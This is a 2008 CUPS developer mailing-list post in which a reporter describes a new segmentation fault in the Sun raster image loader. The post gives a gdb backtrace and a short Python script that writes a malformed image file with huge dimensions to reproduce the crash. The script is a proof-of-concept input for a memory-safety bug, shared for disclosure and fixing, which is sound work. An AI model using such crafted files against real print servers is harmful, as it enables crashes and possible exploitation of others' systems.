[cups.bugs] [MOD] STR #2790: Integer overflows in PNG image loading code
Thomas Pollet
thomas.pollet at gmail.com
Wed Apr 9 06:32:05 PDT 2008
Hi,
I also crashed image-sun.c, don't know how exactly as of now, I'll keep you
informed.
Should I create a new bugzilla ?
Program received signal SIGSEGV, Segmentation fault.
0xb7fd2af5 in get_tile (img=0x8052638, x=0, y=1) at image.c:752
752 if ((ic = tile->ic) == NULL)
(gdb) bt
#0 0xb7fd2af5 in get_tile (img=0x8052638, x=0, y=1) at image.c:752
#1 0xb7fd2463 in _cupsImagePutRow (img=0x8052638, x=0, y=1, width=19088743,
pixels=0xb0ed8008 "") at image.c:533
#2 0xb7fccc0d in _cupsImageReadSunRaster (img=0x8052638, fp=0x80524d0,
primary=CUPS_IMAGE_RGB_CMYK,
secondary=CUPS_IMAGE_WHITE, saturation=100, hue=0, lut=0x0) at
image-sun.c:372
#3 0xb7fd1dd6 in cupsImageOpen (filename=0xbffff5a5
"/var/spool/cups/d00341-001", primary=CUPS_IMAGE_RGB_CMYK,
secondary=CUPS_IMAGE_WHITE, saturation=100, hue=0, lut=0x0) at
image.c:373
#4 0x08049d68 in main (argc=7, argv=0xbffffb54) at imagetops.c:302
reproduce with python:
img=(
"\x59\xa6\x6a\x95"
"XSIZ"
"YSIZ"
"RAS_DEPTH"# >0 <32
"RAS_LENGTH"
"RAS_TYPE"
"RAS_MAPTYPE"
"RAS_MAPLEN"
)
from struct import pack
img = img.replace("XSIZ",pack('>L',0x01234567))
img = img.replace("YSIZ",pack('>L',0x12345678))
img = img.replace("RAS_DEPTH",pack('>L',32))
img = img.replace("RAS_LENGTH",pack('>L',32))
img = img.replace("RAS_TYPE",pack('>L',0xaabbccdd))
img = img.replace("RAS_MAPTYPE",pack('>L',0xaabbccdd))
img = img.replace("RAS_MAPLEN",pack('>L',700))
fout = open("img.sun","w")
fout.write(img)
Regards,
Thomas Pollet
On 09/04/2008, Michael Sweet <msweet at apple.com> wrote:
>
> [STR Closed w/Resolution]
>
> Fixed in Subversion repository.
>
> Link: http://www.cups.org/str.php?L2790
> Version: 1.3-current
> Fix Version: 1.4-current
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.cups.org/pipermail/cups-devel/attachments/20080409/442628b6/attachment.html>
More information about the cups-devel
mailing list